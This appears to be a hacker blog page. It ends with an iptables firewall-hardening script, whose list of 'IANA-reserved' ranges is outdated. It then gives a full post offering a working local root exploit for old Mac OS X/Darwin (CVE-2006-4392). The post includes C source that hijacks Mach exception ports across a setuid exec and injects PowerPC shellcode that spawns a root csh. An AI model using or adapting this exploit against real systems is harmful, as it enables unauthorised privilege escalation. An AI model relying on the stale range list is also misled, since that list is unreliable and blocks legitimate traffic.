"${IPTABLES}" -A INPUT -i ${DMZ_IF} -j ACCEPT
"${IPTABLES}" -A OUTPUT -o ${DMZ_IF} -j ACCEPT
echo "Permit all traffic on ${DMZ_IF}"
fi

# disable ports explicitly
for port in ${PORTS_TO_DISABLE}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (tcp) (DROPLOG)"
"${IPTABLES}" -A INPUT -p udp --dport ${port} -j DROPLOG
echo "Disabled input port ${port} on ${NET_IF} (udp) (DROPLOG)"
done

if [ -n "${KILL_PORT_SCANNING}" ]; then
echo "Killing port scanning attempts on ${NET_IF}, against port ${PORT_SCANNING_PORT}, ban seconds: ${PORT_SCANNING_SECONDS}"
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP
"${IPTABLES}" -A FORWARD -m recent --name portscan --rcheck --seconds "${PORT_SCANNING_SECONDS}" -j DROP

# Once the day has passed, remove them from the portscan list
"${IPTABLES}" -A INPUT -i ${NET_IF} -m recent --name portscan --remove
"${IPTABLES}" -A FORWARD -m recent --name portscan --remove

# These rules add scanners to the portscan list, and log the attempt.
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A INPUT -i ${NET_IF} -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP

"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j LOG --log-prefix "Portscan(host_destroyed): "
"${IPTABLES}" -A FORWARD -p tcp -m tcp --dport "${PORT_SCANNING_PORT}" -m recent --name portscan --set -j DROP
fi

# UDP
for port in ${UDP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${UDP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p udp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p udp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing UDP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# TCP
for port in ${TCP_PORTS_INCOMING_ALLOW}; do
"${IPTABLES}" -A INPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A OUTPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP incoming traffic on ${port} on ${NET_IF} (ACCEPT)"
done
for port in ${TCP_PORTS_OUTGOING_ALLOW}; do
"${IPTABLES}" -A OUTPUT -p tcp --dport ${port} --sport 1024:65535 -j ACCEPT
"${IPTABLES}" -A INPUT -p tcp --sport ${port} --dport 1024:65535 -m state --state RELATED,ESTABLISHED -j ACCEPT
echo "Allowing TCP outgoing traffic on ${port} on ${NET_IF} (ACCEPT)"
done

# Timed ports
for port in ${TIMED_PORTS}; do
# TCP
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p tcp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (tcp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"
# UDP
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --set
# log before TIMED_PORTS_HIT_COUNT
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount $((${TIMED_PORTS_HIT_COUNT}-1)) -j LOG
"${IPTABLES}" -I INPUT -p udp --dport ${port} -i ${NET_IF} -m state --state NEW -m recent --update \
--seconds ${TIMED_PORTS_TIMER_SECS} --hitcount ${TIMED_PORTS_HIT_COUNT} -j DROP
echo "Setting up timed port feature on ${port} on ${NET_IF} (udp) [seconds:${TIMED_PORTS_TIMER_SECS}|hit_count:${TIMED_PORTS_HIT_COUNT}] (DROP)"

done

# ignore microsoft ports?
if [ -n "${IGNORE_MICROSOFT_SHIT}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
"${IPTABLES}" -A INPUT -p udp -m multiport --dports 135,137,138,139,445,1433,1434,3306 -j DROP
fi

# ICMP TYPES
"${IPTABLES}" -N RELATED_ICMP
if [ -n "${ALLOW_SANE_ICMP}" ]; then
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp -m icmp -m limit --limit "${ICMP_PACKETS_PER_SECOND}/second" -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type destination-unreachable -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type time-exceeded -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-reply -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type echo-request -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -i ${NET_IF} -p icmp --icmp-type parameter-problem -j ACCEPT
"${IPTABLES}" -A RELATED_ICMP -j DROPLOG
echo "Allowing sane ICMP, only accept some reliable ICMP packets"
elif [ -n "${FUCK_ICMP_I_DONT_NEED_IT}" ]; then
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo "Ignoring all ICMP traffic"
fi
ignore_icmp_broadcast="0"
if [ -n "${IGNORE_ICMP_BROADCASTS}" ]; then
# ignore broadcast requests
ignore_icmp_broadcast="1"
fi
echo "Ignoring ICMP echo broadcasts"
echo ${ignore_icmp_broadcast} > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

# Rate Limit RST packets
if [ -n "${RST_PACKETS_PER_SECOND}" ]; then
"${IPTABLES}" -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit "${RST_PACKETS_PER_SECOND}/second" --limit-burst 2 -j ACCEPT
fi

# make it even harder to multi-ping
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j ACCEPT
"${IPTABLES}" -A INPUT -p icmp -m limit --limit 1/s --limit-burst 2 -j LOG --log-prefix PING-DROP:
"${IPTABLES}" -A INPUT -p icmp -j DROP
"${IPTABLES}" -A OUTPUT -p icmp -j ACCEPT
# Drop all fragmented ICMP packets, malicious
"${IPTABLES}" -A INPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp --fragment -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp --fragment -j DROPLOG
# Allow all ESTABLISHED ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state ESTABLISHED -j ACCEPT ${RLIMIT}
# Allow some parts of the RELATED ICMP traffic, block the rest.
"${IPTABLES}" -A INPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
"${IPTABLES}" -A OUTPUT -p icmp -m state --state RELATED -j RELATED_ICMP ${RLIMIT}
# Allow incoming ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A INPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Allow outgoing ICMP echo requests (ping), but only rate-limited.
"${IPTABLES}" -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT ${RLIMIT}
# Drop any other ICMP traffic.
"${IPTABLES}" -A INPUT -p icmp -j DROPLOG
"${IPTABLES}" -A OUTPUT -p icmp -j DROPLOG
"${IPTABLES}" -A FORWARD -p icmp -j DROPLOG
echo "Configured stricted ICMP rules"

# explicitly drop invalid incoming/outgoing traffic
"${IPTABLES}" -A INPUT -m state --state INVALID -j DROP
"${IPTABLES}" -A OUTPUT -m state --state INVALID -j DROP
# If we would use NAT, INVALID packets would pass - BLOCK them anyways
"${IPTABLES}" -A FORWARD -m state --state INVALID -j DROP
echo "Dropped all INVALID incoming/outgoing traffic"

# PORT Scanners (stealth also)
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL ALL -j DROP
"${IPTABLES}" -A INPUT -m state --state NEW -p tcp --tcp-flags ALL NONE -j DROP
echo "Made port-scanner life harder"

if [ -n "${SYN_FLOOD_PROTECTION}" ]; then
"${IPTABLES}" -N SYN_FLOOD
"${IPTABLES}" -A INPUT -p tcp --syn -j SYN_FLOOD
"${IPTABLES}" -A SYN_FLOOD -m limit --limit 2/s --limit-burst 6 -j RETURN
"${IPTABLES}" -A SYN_FLOOD -j DROP
echo "Made SYN packets life harder (setting 2/s limit, 6 burst packets thresholds)"
fi

if [ -n "${DROP_IANA_IPS}" ]; then
"${IPTABLES}" -A INPUT -s 0.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 2.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 5.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 7.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 10.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 23.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 27.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 31.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 36.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 39.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 42.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 49.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 50.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 77.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 78.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 92.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 96.0.0.0/4 -j DROP
"${IPTABLES}" -A INPUT -s 112.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 120.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 169.254.0.0/16 -j DROP
"${IPTABLES}" -A INPUT -s 172.16.0.0/12 -j DROP
"${IPTABLES}" -A INPUT -s 173.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 174.0.0.0/7 -j DROP
"${IPTABLES}" -A INPUT -s 176.0.0.0/5 -j DROP
"${IPTABLES}" -A INPUT -s 184.0.0.0/6 -j DROP
"${IPTABLES}" -A INPUT -s 192.0.2.0/24 -j DROP
"${IPTABLES}" -A INPUT -s 197.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 198.18.0.0/15 -j DROP
"${IPTABLES}" -A INPUT -s 223.0.0.0/8 -j DROP
"${IPTABLES}" -A INPUT -s 224.0.0.0/24 -j DROP
echo "Dropped all IANA-reserved IP ranges"
fi

# kick off identd quick
if [ -n "${KILL_IDENTD}" ]; then
"${IPTABLES}" -A INPUT -p tcp -i ${NET_IF} --dport 113 -j REJECT --reject-with tcp-reset
echo "Dropped identd request completely on ${NET_IF} (REJECT)"
fi

if [ -f "${CUSTOM_RULES_FILE_POST}" ]; then
source "${CUSTOM_RULES_FILE_POST}"
fi

# close both TCP and UDP
iptables -A OUTPUT -j REJECTLOG
iptables -A INPUT -j REJECTLOG
iptables -A FORWARD -j REJECTLOG

enjoy some protection!

xd

comments: 0 » tags: , , , , ,

[Thousand-day] MacOSx/Darwin8 reworked mach handling exploit

Posted on 3rd December 2011 in Exploits

An old reworked MacosX/Darwin kernel sploit.. handy when pentesting some things ;)
For mainly, users of Apple objects …

//reworked: macosex.c
/* excploit.c - 28 Nov 2005 - xmath@math.leidenuniv.nl
 * Exploitable Mach Exception Handling
 * Affected:  Mac OS X 10.4.6 (darwin 8.6.0) and older
 * When a process executes a setuid executable, all existing rights to the
 * task port are invalidated, to make sure unauthorized processes do not
 * retain control of the process.  Exception handlers however remain installed,
 * and when some kind of hardware exception occurs, the exception handler can
 * receive a new right to the task port as one of its arguments, and thus
 * regain full control over the process.
 * Interestingly, the code to reset the exception handlers (and hence thwart
 * this attack) upon exec() of a setuid executable has been present in the
 * kernel since OSX 10.3, but is disabled (#if 0) for unspecified reasons.
 * ADDED 10.3.x support now
 * This exploit installs an exception handler on illegal memory access, forks
 * off a child (the handler is inherited), and uses RLIMIT_STACK to cause a
 * segfault after exec().  The shell code invokes /bin/csh now
 * Greetings to Scrippie and #vuln
 */
/*
 * http://docs.info.apple.com/article.html?artnum=304460
 * Kernel
 * CVE-ID: CVE-2006-4392
 * Available for: Mac OS X v10.4 through Mac OS X v10.4.7, Mac OS X Server v10.4 through Mac OS X Server v10.4.7
 * Impact: Local users may be able to run arbitrary code with raised privileges
 * Description: An error handling mechanism in the kernel, known as Mach exception ports, provides the ability
 * to control programs when certain types of errors are encountered. Malicious local users could use this mechanism
 * to execute arbitrary code in privileged programs if an error is encountered. This update addresses the issue by
 * restricting access to Mach exception ports for privileged programs. Credit to Dino Dai Zovi of Matasano Security
 * for reporting this issue.
 * did you guys really forget to patch 10.3 ?
 * I know the original exploit didn't compile there but comon guys.
 * This is a patch for http://www.milw0rm.com/exploits/2463
 * http://cds.xs4all.nl:8081/tmp/excploit.c
 * Dropped in http://blogs.23.nu/ilja/ on Sept 21 2006
 * - KF
 */
#include <sys/time.h>   // One liner to make it compile on 10.3.X (mod #1)
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>
#include <mach/mach.h>

extern boolean_t exc_server(mach_msg_header_t *, mach_msg_header_t *);

int main(void) {
mach_port_t self = mach_task_self(), exc;
mach_port_allocate(self, MACH_PORT_RIGHT_RECEIVE, &exc);
mach_port_insert_right(self, exc, exc, MACH_MSG_TYPE_MAKE_SEND);
task_set_exception_ports(self, EXC_MASK_BAD_ACCESS, exc,EXCEPTION_STATE_IDENTITY, PPC_THREAD_STATE);
if (fork()) {
mach_msg_server_once(exc_server, 512, exc, 0);
wait(NULL);
} else {
static struct rlimit rl;
setrlimit(RLIMIT_STACK, &rl);
execl("/usr/bin/chsh", "chsh", NULL);
}
return 0;
}

static long implant[] = {
0x48000015, 0x00000000, 0x00100000, 0x00000000,
0x00100000, 0x7ca802a6, 0x38600003, 0x38850000,
0x380000c3, 0x44000002, 0x60000000, 0x38600000,
0x38000017, 0x44000002, 0x60000000, 0x38600000,
0x380000b5, 0x44000002, 0x60000000, 0x38650068,
0x38850074, 0x90640000, 0x3800003b, 0x44000002,
0x60000000, 0x38000001, 0x44000002, 0x2f2f2f62,  // /bin/csh is more fun than /usr/bin/id (mod #2)
0x696e2f63, 0x73680000, 0x00000000, 0x00000000,
};

kern_return_t catch_exception_raise_state_identity(mach_port_t exc, thread_t t,
task_t task, exception_type_t e, exception_data_t ed,
mach_msg_type_number_t edsz, int *f, thread_state_t *is,
mach_msg_type_number_t isz, thread_state_t *os) {
vm_allocate(task, os, sizeof implant, TRUE);
vm_write(task, *os, implant, sizeof implant);
return KERN_SUCCESS;
}

Enjoy the reworked version wich drops you into csh :-)
xd // Admin // #Haxnet admim

comments: 1 » tags: